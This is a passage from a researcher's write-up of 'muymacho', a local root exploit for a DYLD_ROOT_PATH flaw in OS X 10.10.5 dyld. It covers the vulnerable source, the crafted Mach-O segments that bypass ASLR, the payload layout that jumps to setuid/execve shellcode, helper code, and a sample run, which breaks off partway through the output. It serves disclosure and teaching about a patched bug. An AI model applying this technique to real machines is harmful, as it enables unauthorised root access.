muymacho is an exploit for a dyld bug present in Mac OS X 10.10.5 allowing local privilege escalation to root. It has been patched in El Capitan (10.11).

It was a fun bug and exploit to develop. This post is written as a guide through the process. You can follow along while viewing the dyld source. I hope you enjoy muymacho.

This post covers the various stages of developing the exploit from discovery, past potential problems, to the completed exploit.

… dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)

Discovery

The bug was discovered during a source code audit of dyld-353.2.1 (10.10.0 to 10.10.4) and continued in IDA Pro with the binary release of the 10.10.5 update. Apple eventually released source for 10.10.5 on 9/17/2015. The post has been updated to include the newer dyld source code.

The interest in dyld came from a challenge @iOn1c posted on 7/20.

@i0n1c tweet

I found the bug relating to the DYLD_PRINT_TO_FILE environment variable and wrote an exploit. Shortly afterwards, i0n1c released his writeup and an exploit.

While I was hunting for the DYLD_PRINT_TO_FILE vulnerability, I spotted some questionable code. I went back and discovered a vulnerability related to DYLD_ROOT_PATH. I’m certainly not the first or only person to discover this vulnerability.

@i0n1c tweet

@beist tweet

Note: I think that this vulnerability may have assigned CVE-2015-5876 (credited to beist of grayhash). See the CVE number section in the appendix for more details.

The DYLD_ROOT_PATH vulnerability is the subject of this post and is detailed in the following sections. It has been patched in El Capitan.

dyld is the dynamic linker for Mac OS X and iOS. It works in conjunction with the system loader to prepare a process for execution. The basic steps are:

  • The system loader maps both the binary’s pages and dyld into memory.
  • Control is then handed over to dyld, so it can load and link other libraries and their dependencies into the process address space.
  • The process loading is complete and execution begins at the executable’s entry point in memory.

During the execution of a suid binary, dyld is running with elevated privileges. The binary has not actually begun executing and thus cannot yet lower privileges.

For more details checkout these references here and here (dyld is much more complex than summarized in this post).

The vulnerability is related to the use of the DYLD_ROOT_PATH environment variable. The following is an excerpt from the dyld man page:

DYLD_ROOT_PATH

This is a colon separated list of directories. The dynamic linker will prepend each of this directory paths to every image access until a file is found.

While the above statement is true, there is an additional use that appears to be undocumented. In order to understand the use, we need to digress into discussing the iOS simulator. Unlike Android which uses an emulator (executes ARM instructions), iOS uses a simulator that runs applications compiled for x86_64. One of the simulator steps replaces the built in dyld with a special iOS simulator version. The special version is creatively called dyld_sim.

In order to to use dyld_sim, the DYLD_ROOT_PATH environment variable is set to a base directory before executing a program.

$ DYLD_ROOT_PATH=/Users/user/tmp crontab

The example above expects dyld_sim to be located off of the base directory at the following location:

/Users/user/tmp/usr/lib/dyld_sim

The details of the vulnerability are in the next section. However, spoiler alert, insufficient validation of the dyld_sim file is to blame. dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)

Vulnerability

The majority of this analysis references dyld.cpp from dyld-353.2.3 (10.10.5), with the exception of the 10.10.4 section in the appendix. The bug appears to have been introduced in dyld-239.3 which coincides with the release of OS X 10.9.

The vulnerability is located in the dyld.cpp:useSimulatorDyld() function. If a dyld_sim file exists in the directory specified in the DYLD_ROOT_PATH variable, it’s opened and the resulting file descriptor is passed to useSimulatorDyld().

The code below shows the call from dyld.cpp:_main().

strlcat(simDyldPath, "/usr/lib/dyld_sim", PATH_MAX);
   int fd = my_open(simDyldPath, O_RDONLY, 0);
   if ( fd != -1 ) {
      result = useSimulatorDyld(fd, mainExecutableMH, simDyldPath, argc, argv, envp, apple, startGlue);
      if ( !result && (*startGlue == 0) )
         halt("problem loading iOS simulator dyld");

The function useSimulatorDyld() is shown below in its entirety. It handles the parsing and loading of dyld_sim. It should be noted that any failures in useSimulatorDyld() cause the process to halt.

__attribute__((noinline))
static uintptr_t useSimulatorDyld(int fd, const macho_header* mainExecutableMH, const char* dyldPath, 
                int argc, const char* argv[], const char* envp[], const char* apple[], uintptr_t* startGlue)
{
  *startGlue = 0;
  
  // verify simulator dyld file is owned by root
  struct stat sb;
  if ( fstat(fd, &sb) == -1 )
    return 0;

  // read first page of dyld file
  uint8_t firstPage[4096];
  if ( pread(fd, firstPage, 4096, 0) != 4096 )
    return 0;
  
  // if fat file, pick matching slice
  uint64_t fileOffset = 0;
  uint64_t fileLength = sb.st_size;
  const fat_header* fileStartAsFat = (fat_header*)firstPage;
  if ( fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) {
    if ( !fatFindBest(fileStartAsFat, &fileOffset, &fileLength) ) 
      return 0;
    // re-read buffer from start of mach-o slice in fat file
    if ( pread(fd, firstPage, 4096, fileOffset) != 4096 )
      return 0;
  }
  else if ( !isCompatibleMachO(firstPage, dyldPath) ) {
    return 0;
  }
  
  // calculate total size of dyld segments
  const macho_header* mh = (const macho_header*)firstPage;
  uintptr_t mappingSize = 0;
  uintptr_t preferredLoadAddress = 0;
  const uint32_t cmd_count = mh->ncmds;
  const struct load_command* const cmds = (struct load_command*)(((char*)mh)+sizeof(macho_header));
  const struct load_command* cmd = cmds;
  for (uint32_t i = 0; i < cmd_count; ++i) {
    switch (cmd->cmd) {
      case LC_SEGMENT_COMMAND:
        {
          struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
          mappingSize += seg->vmsize;
          if ( seg->fileoff == 0 )
            preferredLoadAddress = seg->vmaddr;
        }
        break;
    }
    cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
  }

  // reserve space, then mmap each segment
  vm_address_t loadAddress = 0;
  uintptr_t entry = 0;
  if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
    return 0;
  cmd = cmds;
  struct linkedit_data_command* codeSigCmd = NULL;
  for (uint32_t i = 0; i < cmd_count; ++i) {
    switch (cmd->cmd) {
      case LC_SEGMENT_COMMAND:
        {
          struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
          uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
          void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
          //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
          if ( segAddress == (void*)(-1) )
            return 0;
        }
        break;
      case LC_UNIXTHREAD:
        {
        #if __i386__
          const i386_thread_state_t* registers = (i386_thread_state_t*)(((char*)cmd) + 16);
          entry = (registers->__eip + loadAddress - preferredLoadAddress);
        #elif __x86_64__
          const x86_thread_state64_t* registers = (x86_thread_state64_t*)(((char*)cmd) + 16);
          entry = (registers->__rip + loadAddress - preferredLoadAddress);
        #endif
        }
        break;
      case LC_CODE_SIGNATURE:
        codeSigCmd = (struct linkedit_data_command*)cmd;
        break;
    }
    cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
  }
  
  if ( codeSigCmd == NULL )
    return 0;

  fsignatures_t siginfo;
  siginfo.fs_file_start=fileOffset;             // start of mach-o slice in fat file 
  siginfo.fs_blob_start=(void*)(long)(codeSigCmd->dataoff); // start of code-signature in mach-o file
  siginfo.fs_blob_size=codeSigCmd->datasize;          // size of code-signature
  int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
  if ( result == -1 ) {
    dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
    return 0;
  }

  close(fd);

  // notify debugger that dyld_sim is loaded
  dyld_image_info info;
  info.imageLoadAddress = (mach_header*)loadAddress;
  info.imageFilePath    = strdup(dyldPath);
  info.imageFileModDate = sb.st_mtime;
  addImagesToAllImages(1, &info);
  dyld::gProcessInfo->notification(dyld_image_adding, 1, &info);
  
  // jump into new simulator dyld
  typedef uintptr_t (*sim_entry_proc_t)(int argc, const char* argv[], const char* envp[], const char* apple[],
                const macho_header* mainExecutableMH, const macho_header* dyldMH, uintptr_t dyldSlide,
                const dyld::SyscallHelpers* vtable, uintptr_t* startGlue);
  sim_entry_proc_t newDyld = (sim_entry_proc_t)entry;
  return (*newDyld)(argc, argv, envp, apple, mainExecutableMH, (macho_header*)loadAddress, 
           loadAddress - preferredLoadAddress, 
           &sSysCalls, startGlue);
}

The purpose of useSimulatorDyld() is to load dyld_sim, perform some validation, and then hand control over to it. dyld_sim begins execution and the original dyld will be no more.

As can be seen in the source above, useSimulatorDyld() does the following:

  1. Reads in Mach-O headers
  2. Loops through LC_SEGMENT_64 commands and determines total size
  3. vm_allocate() memory
  4. mmap() segments into memory
  5. Verifies the code signature
  6. Jumps into the dyld_sim entry point

muymacho exploits a DYLD_ROOT_PATH vulnerability present since 10.9. However, there was an additional attack vector present in versions up to 10.10.4, that has been patched in the 10.10.5 update.

The astute reader will notice that the vulnerability is in the processing of dyld_sim’s Mach-O headers. A malformed Mach-O file allows memory segments to be replaced leading to arbitrary execution of code, which happens prior to signature verification.

In order to understand how the remapping is possible, we need a little review of Mach-O. Apple provides a full Mach-O reference document. However, the two relevant structures are shown below, with the most important one being segment_command_64.

/*
 * The 64-bit mach header appears at the very beginning of object files for
 * 64-bit architectures.
 */
struct mach_header_64 {
   uint32_t      magic;      /* mach magic number identifier */
   cpu_type_t    cputype;    /* cpu specifier */
   cpu_subtype_t cpusubtype; /* machine specifier */
   uint32_t      filetype;   /* type of file */
   uint32_t      ncmds;      /* number of load commands */
   uint32_t      sizeofcmds; /* the size of all the load commands */
   uint32_t      flags;      /* flags */
   uint32_t      reserved;   /* reserved */
};

/*
 * The 64-bit segment load command indicates that a part of this file is to be
 * mapped into a 64-bit task's address space.  If the 64-bit segment has
 * sections then section_64 structures directly follow the 64-bit segment
 * command and their size is reflected in cmdsize.
 */
struct segment_command_64 { /* for 64-bit architectures */
   uint32_t   cmd;          /* LC_SEGMENT_64 */
   uint32_t   cmdsize;      /* includes sizeof section_64 structs */
   char       segname[16];  /* segment name */
   uint64_t   vmaddr;       /* memory address of this segment */
   uint64_t   vmsize;       /* memory size of this segment */
   uint64_t   fileoff;      /* file offset of this segment */
   uint64_t   filesize;     /* amount to map from the file */
   vm_prot_t  maxprot;      /* maximum VM protection */
   vm_prot_t  initprot;     /* initial VM protection */
   uint32_t   nsects;       /* number of sections in segment */
   uint32_t   flags;        /* flags */
};

First useSimulatorDyld() needs to extract the Mach-O header. As can be seen in the source, there is some initial code to determine where the actual header is located in the case of a universal binary. dyld then reads in a page (0x1000 bytes) of data containing the Mach-O header.

After retrieving the header, useSimulatorDyld() processes the load commands. This is accomplished in two loops that cycle through load commands such as LC_SEGMENT_64, LC_UNIXTHREAD, and LC_CODE_SIGNATURE.

The first of the two processing loops is shown below. It looks at LC_SEGMENT_64 load commands. It calculates the total vmsize and determines preferredLoadAddress. If no segments have a fileoff of 0, preferredLoadAddress defaults to 0.

for (uint32_t i = 0; i < cmd_count; ++i) {
      switch (cmd->cmd) {
         case LC_SEGMENT_COMMAND: // <-- Note: defined in a macro as LC_SEGMENT_64 
            {
               struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
               mappingSize += seg->vmsize;
               if ( seg->fileoff == 0 )
                  preferredLoadAddress = seg->vmaddr;
            }
            break;
      }
      cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
   }

vm_allocate() is called with the calculated mappingSize. The address of the allocated memory is stored in loadAddress. If the allocation fails, the useSimulatorDyld() function exits.

if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
      return 0;

After allocating memory, the second loop is encountered and the relevant code can be seen below. This loop also parses LC_UNIXTHREAD and LC_CODESIGNATURE load commands, but they are not relevant to the vulnerability.

The load command that leads to exploitation is LC_SEGMENT_64.

case LC_SEGMENT_COMMAND: // <- this is defined in a macro as LC_SEGMENT_64
   {
      struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
      uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
      void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
      //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
      if ( segAddress == (void*)(-1) )
         return 0;
   }

Looking at the code, the intended function of the case statement is to map segments into the newly allocated memory. However, there is almost zero validation of the LC_SEGMENT_64 fields. Specifically, the code calculates a requestedLoadAddress based on controllable fields in a Mach-O binary.

uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;

preferredLoadAddress defaults to 0, leaving only loadAddress and seg->vmaddr in play. The following is a simplified equation that will be used throughout this post in various forms:

requestedLoadAddress = seg->vmaddr + loadAddress

seg->vmaddr is taken directly from the segment command and added to loadAddress (set by vm_allocate). This results in a partially controlled requestedLoadAddress which is then passed to mmap.

mmap is using some very interesting flags, in particular MAP_FIXED. The following is an excerpt from the mmap man page:

MAP_FIXED

Do not permit the system to select a different address than the one specified. If the specified address cannot be used, mmap() will fail. If MAP_FIXED is specified, addr must be a multiple of the pagesize. If a MAP_FIXED request is successful, the mapping established by mmap() replaces any previous mappings for the process’ pages in the range from addr to addr + len. Use of this option is discouraged.

The key words are “replaces any previous mapping”. Mappings such as heaps, the stack, and even executable pages can be replaced. An attacker can create a Mach-O file with crafted LC_SEGMENT_64 load commands. This provides not only partial control of requestedLoadAddress, but also full control of page permissions, filesize, and fileoff.

Manual testing within the debugger confirmed successful replacement of executable pages upon the return of the mmap system call.

Exploit

The following is a cheat sheet, providing a quick reference to various definitions and terms:

CHEAT SHEET

loadAddress
address returned by vm_allocate()
vmaddr
segment’s vmaddr value (seg->vmaddr)
mmap_equation
requestedLoadAddress = vmaddr + loadAddress

Given the ability to replace executable pages in memory, exploitation becomes relatively simple. ROP is not necessary since we control the content of the newly mapped executable pages. Our target page for remapping will be the page containing the mmap system call in dyld. If modern OS X did not have ASLR, this would be trivial. We first cover exploitation without ASLR, then cover how to bypass it

Since dyld is the dynamic linker, it needs to be self contained. dyld includes all the system calls it uses. The useSimulatorDyld() function calls the ::mmap() function (wrapper) which in turn calls ___mmap().

00007FFF5FC2693E           mov     r12d, ecx
00007FFF5FC26941           mov     r8d, r15d
00007FFF5FC26944           call    ___mmap
00007FFF5FC26949           mov     rbx, rax
00007FFF5FC2694C           lea     rax, ___syscall_logger

The ___mmap() function contains the mmap system call.

00007FFF5FC26DBC ___mmap   proc near               ; CODE XREF: _mmap+31p
00007FFF5FC26DBC           mov     eax, 20000C5h
00007FFF5FC26DC1           mov     r10, rcx
00007FFF5FC26DC4           syscall
00007FFF5FC26DC6           jnb     short locret_7FFF5FC26DD0

When the mmap system call returns, the instruction pointer will be at address 0x7fff5fc26dc6. Passing mmap a requestedLoadAddress of 0x7fff5fc26000 will replace our targeted mmap system call page. With the segment mapped in, the process begins executing our code.

As shown previously, the requestedLoadAddress is calculated in the second loop like so:

uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;

The simplified mmap_equation (preferredLoadAddress defaults to 0) is:

requestedLoadAddress = seg->vmaddr + loadAddress

If we recall, loadAddress is set by the call to vm_allocate. As shown below, vm_allocate returns an address located after the base program’s pages. For example, crontab generates the following memory map:

==== regions for process 44045  (non-writable and writable regions are interleaved)
REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
mapped file            0000000100000000-0000000100005000 [   20K] r-x/rwx SM=COW  /Users/user/tmp/crontab
mapped file            0000000100005000-0000000100006000 [    4K] rw-/rwx SM=COW  /Users/user/tmp/crontab
mapped file            0000000100006000-0000000100009000 [   12K] r--/rwx SM=COW  /Users/user/tmp/crontab
VM_ALLOCATE (reserved) 0000000100009000-0000000100029000 [  128K] rw-/rwx SM=NUL  reserved VM address space (unallocated)
STACK GUARD            00007fff5bc00000-00007fff5f400000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
Stack                  00007fff5f400000-00007fff5fbff000 [ 8188K] rw-/rwx SM=PRV  thread 0
Stack                  00007fff5fbff000-00007fff5fc00000 [    4K] rw-/rwx SM=COW
__TEXT                 00007fff5fc00000-00007fff5fc37000 [  220K] r-x/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff5fc37000-00007fff5fc3a000 [   12K] rw-/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff5fc3a000-00007fff5fc70000 [  216K] rw-/rwx SM=PRV  /usr/lib/dyld
__LINKEDIT             00007fff5fc70000-00007fff5fc84000 [   80K] r--/rwx SM=COW  /usr/lib/dyld
shared memory          00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM
shared memory          00007fffffeed000-00007fffffeee000 [    4K] r-x/r-x SM=SHM

Given the memory map above, loadAddress is 0x100009000 (VM_ALLOCATE). Solving for seg->vmaddr results in 0x7ffe5fc1d000, which would replace the dyld executable page at 0x7fff5fc26000.

seg->vmaddr = requestedLoadAddress - loadAddress
seg->vmaddr = 0x7fff5fc26000 - 0x100009000
seg->vmaddr = 0x7ffe5fc1d000

We can craft Mach-O file with a seg->vmaddr value of 0x7ffe5fc1d000 and the exploit would be done.

macho_single

The above memory map and calculations do not include ASLR in order to simplify discussion. The next section delves into bypassing ASLR.

Bypassing ASLR

The following is an updated cheat sheet. providing a quick reference to various definitions and terms:

CHEAT SHEET

loadAddress
address returned by vm_allocate()
vmaddr
segment’s vmaddr value (seg->vmaddr)
dyld_target
dyld page we are targetting (contains the mmap syscall)
mmap_equation
requestedLoadAddress = vmaddr + loadAddress
ASLR slide
random offset applied to memory regions
0x0000000 to 0xffff000 bytes (0 to 0xffff pages)

The previous section ignores ASLR, which must be considered. ASLR adds slides to various memory regions including executable pages, stack, and the dyld executable pages. This is done to mitigate attacks since there aren’t set memory addresses for resources.

The following is an example of a memory layout with ASLR. Notice how dyld isn’t loaded at its preferred offset unlike the previous vmmap output, and is in fact slid by 0x9f40000 bytes.

==== regions for process 44357  (non-writable and writable regions are interleaved)
REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
mapped file            0000000102da7000-0000000102dac000 [   20K] r-x/rwx SM=COW  /usr/bin/crontab
mapped file            0000000102dac000-0000000102dad000 [    4K] rw-/rwx SM=COW  /usr/bin/crontab
mapped file            0000000102dad000-0000000102db0000 [   12K] r--/rwx SM=COW  /usr/bin/crontab
VM_ALLOCATE (reserved) 0000000102db0000-0000000102dd0000 [  128K] rw-/rwx SM=NUL  reserved VM address space (unallocated)
STACK GUARD            00007fff58e59000-00007fff5c659000 [ 56.0M] ---/rwx SM=NUL  stack guard for thread 0
Stack                  00007fff5c659000-00007fff5ce58000 [ 8188K] rw-/rwx SM=ZER  thread 0
Stack                  00007fff5ce58000-00007fff5ce59000 [    4K] rw-/rwx SM=COW
__TEXT                 00007fff69b09000-00007fff69b40000 [  220K] r-x/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff69b40000-00007fff69b43000 [   12K] rw-/rwx SM=COW  /usr/lib/dyld
__DATA                 00007fff69b43000-00007fff69b79000 [  216K] rw-/rwx SM=PRV  /usr/lib/dyld
__LINKEDIT             00007fff69b79000-00007fff69b8d000 [   80K] r--/rwx SM=COW  /usr/lib/dyld
shared memory          00007fffffe00000-00007fffffe01000 [    4K] r--/r-- SM=SHM
shared memory          00007fffffeed000-00007fffffeee000 [    4K] r-x/r-x SM=SHM

Other memory regions contain slides. The base binary, crontab, has a 0xda7000 byte slide. The same slide also applies to loadAddress (VM_ALLOCATE region).

Memory regions and ranges

The exploit section solves for the vmaddr value which when added to loadAddress replaces the dyld_target (0x7fff5fc26000) executable page. Our goal is unchanged, we want to map over the dyld_target page with our content. However, we are no longer working with set addresses. We are working with ranges of possible addresses.

Before formulating a plan of attack, we need to determine what the actual memory ranges are. Taking ASLR into account, the possible ranges become:

  • loadAddress: 0x100009000 to 0x110008000 (max ASLR slide = 0x0ffff000)
  • dyld_target: 0x7fff5fc26000 - 0x7fff6fc25000 (max ASLR slide = 0x0ffff000)

Next, we calculate vmaddr’s possible range of values. We want mmap to replace the dyld_target page, so dyld_target is substituted for requestedLoadAddress in the mmap_equation:

vmaddr = dyld_target - loadAddress

In order to determine the vmaddr range, we solve for both the minimum vmaddr as well as the maximum vmaddr. The following diagram should help illustrate how the range is calculated:

ASLR range

The left hand side of the diagram shows the minimum possible vmaddr. It is uses the lowest possible dyld_target and the highest possible loadAddress.

vmaddr_min = (dyld_target + ASLR_slide_min) - (loadAddress + ASLR_slide_max)
vmaddr_min = (0x7fff5fc26000 + 0x00000000) - (0x100009000 + 0x0ffff000)
vmaddr_min = 0x7fff5fc26000 - 0x110008000
vmaddr_min = 0x7ffe4fc1e000

The right hand side of the diagram shows the maximum possible vmaddr. It is uses the highest possible dyld_target and the lowest possible loadAddress.

vmaddr_max = (dyld_target + ASLR_slide_max) - (loadAddress + ASLR_slide_min)
vmaddr_max = (0x7fff5fc26000 + 0x0ffff000) - (0x100009000 + 0x00000000)
vmaddr_max = 0x7fff6fc25000 - 0x100009000
vmaddr_max = 0x7ffe6fc1c000

The vmaddr range is between 0x7ffe4fc1e000 and 0x7ffe6fc1c000. The entire range covers 0x1fffe000 bytes (twice the maximum ASLR slide).

In order to reliably exploit the vulnerabilty, the complete range of memory may need to be mapped in. It’s impractical to map to the entire range in a single segment (nobody wants a 500+ MB exploit !), so we’ll use multiple segments.

Potential problems

At this point, we have to answer a few more questions :

  • How many segments should be used?
  • Can mmap fail?
  • Can unwanted memory corruption occur?

How many segments should be used?

The Mach-O header is read in as only one page (0x1000 bytes) Given that the mach_header_64 structure is 0x20 bytes and the segment_command_64 structure is 72 bytes, there can be a maximum of 56 segments. In order to simplify calculations, muymacho uses 32 segments. All the segment’s fileoff fields will point to the same data (0x1000000 bytes).

segments

The 32 segments will cover the entire vmaddr range (0x1fffe000) with a page to spare.

segment_range

TLDR: 32 segments

Can mmap fail?

The portion of useSimulatorDyld()’s code that calls mmap is show again below. Note that the useSimulatorDyld() function exits if the mmap call fails.

void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
   //dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
   if ( segAddress == (void*)(-1) )
      return 0;

mmap will fail if it attempts to map memory outside of user space (greater than 0x7fffffffffff). We need to ensure that the following is true:

requestedLoadAddress + seg->filesize < 0x7fffffffffff

Due to ASLR, we don’t know the actual loadAddress and dyld_target addresses. We calculated the minimum (0x7ffe4fc1e000) and maximum (0x7ffe6fc1c000) vmaddr which define the range of offsets we must cover in order to negate ASLR.

To calculate the maximum possible requestedLoadAddress, we use the mmap_equation and plug in the maximum possible vmaddr and the maximum possible loadAddress.

requestedLoadAddress = vmaddr + loadAddress
requestedLoadAddress = 0x7ffe6fc1c000 + (loadAddress + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + (0x100009000 + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + 0x110008000 
requestedLoadAddress = 0x7fff7fc24000

A requestedLoadAddress of 0x7fff7fc24000 is well within user space bounds. seg->filesize would need to be greater than 0x803dbfff for the mmap call to fail.

TLDR: mmap is fine :)

Can unwanted memory corruption occur?

Mapping in such large segments (0x1000000), may cause some concern. It really comes down to:

  1. Are we going to corrupt the stack while trying to replace dyld_target?

  2. What happens if we map over a portion of dyld’s pages?

The implementation section will show that muymacho uses a top down strategy. This approach ensures higher pages get replaced first followed by lower pages. The stack is lower than the dyld_target page in memory and at a safe distance. The stack is fine :)

It is possible that only some of dyld pages get mapped in by a segment. The rest of pages would then be mapped in by the next segment. Does it matter? No.

The mmap system call, the wrapper function, and the majority of the parsing loop from useSimulatorDyld() is all contained in the dyld_target page. The rest of useSimulatorDyld() is at lower page.

TLDR: everything is fine :)

Implementation

muymacho uses 32 segments to cover an address range of 0x20000000 bytes. This ensures that entire ASLR memory range is covered. Segments will be mapped in until the dyld_target page is replaced, at which point our code takes control.

A top down strategy is used to prevent unncessary memory corruption, in particular of the stack. The first segment uses the maximum vmaddr value. Subsequent segments use smaller values, allowing the entire range to be covered. The following graphic provides an example. Keep in mind that it is not to scale. dyld_target is one page while the segments are 4096 pages each.

memory map

Eventually dyld_target will be mapped and code execution is achieved. Once the dyld_target page is replaced, control will be instant upon the return of the mmap call.

Maximum vmaddr

The maximum vmaddr used in muymacho differs from what we previously calculated. The following function calculates the maximum vmaddr:

def maximum_vmaddr(segment_size):
    '''
    returns the maximum vmaddr
    
    the function assumes the base binary is 9 pages long
    as is the case for crontab giving a 
    loadAddress_min of 0x100009000
    
    if attacking other suid programs, this value should
    be adjusted. in reality a few pages here or there
    won't have a noticeable effect.
    '''
    dyld_target = 0x7fff5fc26000
    loadAddress_min = 0x100009000 
    aslr_slide_max = 0x0ffff000

    dyld_target_max = dyld_target + aslr_slide_max
    maximum_offset = dyld_target_max - loadAddress_min

    # Only one page from the payload needs to hit the maximum offset.
    vmaddr = maximum_offset - segment_size + 0x1000  

    return vmaddr

The only difference is the following portion of code:

# Only one page from the payload needs to hit the maximum offset.
    vmaddr = maximum_offset - segment_size + 0x1000

The original maximum vmaddr calculations assume we are mapping in a single page. We are actually mapping in 4096 pages at a time.

The calculation is adjusted to only map in one page at the maximum vmaddr, otherwise we are wasting pages that will never replace dyld_target.

The following graphic may help clarify the concept:

vmaddr adjust

The left hand side shows the original maximum vmaddr (0x7ffe6fc1c000) replacing the highest possible dyld_target. All the other pages are superflous, since we are already at the maximum possible vmaddr and the highest possible dyld_target. Only one page from this segment could hit a possible dyld_target.

The right hand side uses the adjusted vmaddr (7ffe6ec1d000). The segment will replace the highest possible dyld_target. All 4096 segment pages could replace possible dyld_target pages.

Payload

The Bypassing ASLR section ensures a segment will be mapped over dyld_target. The payload is 0x1000000 or 4096 pages in total. One of those pages will replace the dyld_target page.

The dyld mmap system call is shown again below.

00007FFF5FC26DBC ___mmap   proc near               ; CODE XREF: _mmap+31p
00007FFF5FC26DBC           mov     eax, 20000C5h
00007FFF5FC26DC1           mov     r10, rcx
00007FFF5FC26DC4           syscall
00007FFF5FC26DC6           jnb     short locret_7FFF5FC26DD0

When the mmap system call returns, execution will continue at offset 0xdc6 in the page. Since rax is used as a return value, it will contain the base address of the newly mapped memory. In other words, rax points to the start of our payload.

All 4096 payload pages contain a jmp rax at offset 0xdc6. The first page at the base of the payload also contains the shellcode at offset 0.

The following diagram shows the base page and a standard page.

payload pages

Regardless of which page lines up with dyld_target, the jmp rax instruction will be executed leading to the shellcode.

The shellcode then performs a setuid(0) syscall call followed by execve(‘/bin/sh’) system call.

Finished exploit

This section combines everything we’ve figured out this far. In summary:

  • Our goal is to remap dyld_target, which is the page contain the mmap system call within dyld
  • We use 32 segments spanning 0x20000000 bytes to bypass ASLR
    • We implement a top down strategy
    • The first segment has a vmaddr of 0x7ffe6ec1d000
    • Subsequent segments have smaller (0x1000000) vmaddr
  • All the segments point to the same 4096 pages of payload
    • All pages contain a jmp rax instruction at offset 0xdc6
    • The base page contains our shellcode

muymacho is written in python and is available on github. There is a very minimal Mach-O implementation in the MachoFile and LC_SEGMENT_64 classes. They create a dyld_sim file containing 32 segments, all pointing to the payload.

muymacho is passed a base directory and will create the necessary directory structure and dyld_sim file. The actual exploitation requires setting DYLD_ROOT_PATH to the base directory and executing a suid binary. A sample run is shown below.

user@yosemite:~/tmp$ python muymacho.py ~/tmp
muymacho.py - exploit for DYLD_ROOT_PATH vuln in OS X 10.10.5
Luis Miras @_luism

[+] using base_directory: /Users/user/tmp
[+] creating dir: /Users/user/tmp/usr/lib
[+] creating macho file: /Users/user/tmp/usr/lib/dyld_sim
    LC_SEGMENT_64: segment 0x00    vm_addr: 0x7ffe6ec1d000
    LC_SEGMENT_64: segment 0x01    vm_addr: 0x7ffe6dc1d000
    LC_SEGMENT_64: segment 0x02    vm_addr: 0x7ffe6cc1d000
    LC_SEGMENT_64: segment 0x03    vm_addr: 0x7ffe6bc1d000
    LC_SEGMENT_64: segment 0x04    vm_addr: 0x7ffe6ac1d000
    LC_SEGMENT_64: segment 0x05    vm_addr: 0x7ffe69c1d000
    LC_SEGMENT_64: segment 0x06    vm_addr: 0x7ffe68c1d000
    LC_SEGMENT_64: segment 0x07    vm_addr: 0x7ffe67c1d000
    LC_SEGMENT_64: segment 0x08    vm_addr: 0x7ffe66c1d000
    LC_SEGMENT_64: segment 0x09    vm_addr: 0x7ffe65c1d000
    LC_SEGMENT_64: segment 0x0a    vm_addr: 0x7ffe64c1d000
    LC_SEGMENT_64: segment 0x0b    vm_addr: 0x7ffe63c1d000
    LC_SEGMENT_64: segment 0x0c    vm_addr: 0x7ffe62c1d000
    LC_SEGMENT_64: segment 0x0d    vm_addr: 0x7ffe61c1d000
    LC_SEGMENT_64: segment 0x0e    vm_addr: 0x7ffe60c1d000
    LC_SEGMENT_64: segment 0x0f    vm_addr: 0x7ffe5fc1d000
    LC_SEGMENT_64: segment 0x10    vm_addr: 0x7ffe5ec1d000
    LC_SEGMENT_64: segment 0x11    vm_addr: 0x7ffe5dc1d000
    LC_SEGMENT_64: segment 0x12    vm_addr: 0x7ffe5cc1d000
    LC_SEGMENT_64: segment 0x13    vm_addr: 0x7ffe5bc1d000
    LC_SEGMENT_64: segment 0x14    vm_addr: 0x7ffe5ac1d000
    LC_SEGMENT_64: segment 0x15    vm_addr: 0x7ffe59c1d000
    LC_SEGMENT_64: segment 0x16    vm_addr: 0x7ffe58c1d000
    LC_SEGMENT_64: segment 0x17    vm_addr: 0x7ffe57c1d000
    LC_SEGMENT_64: segment 0x18    vm_addr: 0x7ffe56c1d000
    LC_SEGMENT_64: segment 0x19    vm_addr: 0x7ffe55c1d000
    LC_SEGMENT_64: segment 0x1a    vm_addr: 0x7ffe54c1d000
    LC_SEGMENT_64: segment 0x1b    vm_addr: 0x7ffe53c1d000
    LC_SEGMENT_64: segment 0x1c    vm_addr: 0x7ffe52c1d000
    LC_SEGMENT_64: segment 0x1d    vm_addr: 0x7ffe51c1d000
    LC_SEGMENT_64: segment 0x1e    vm_addr: 0x7ffe50c1d000
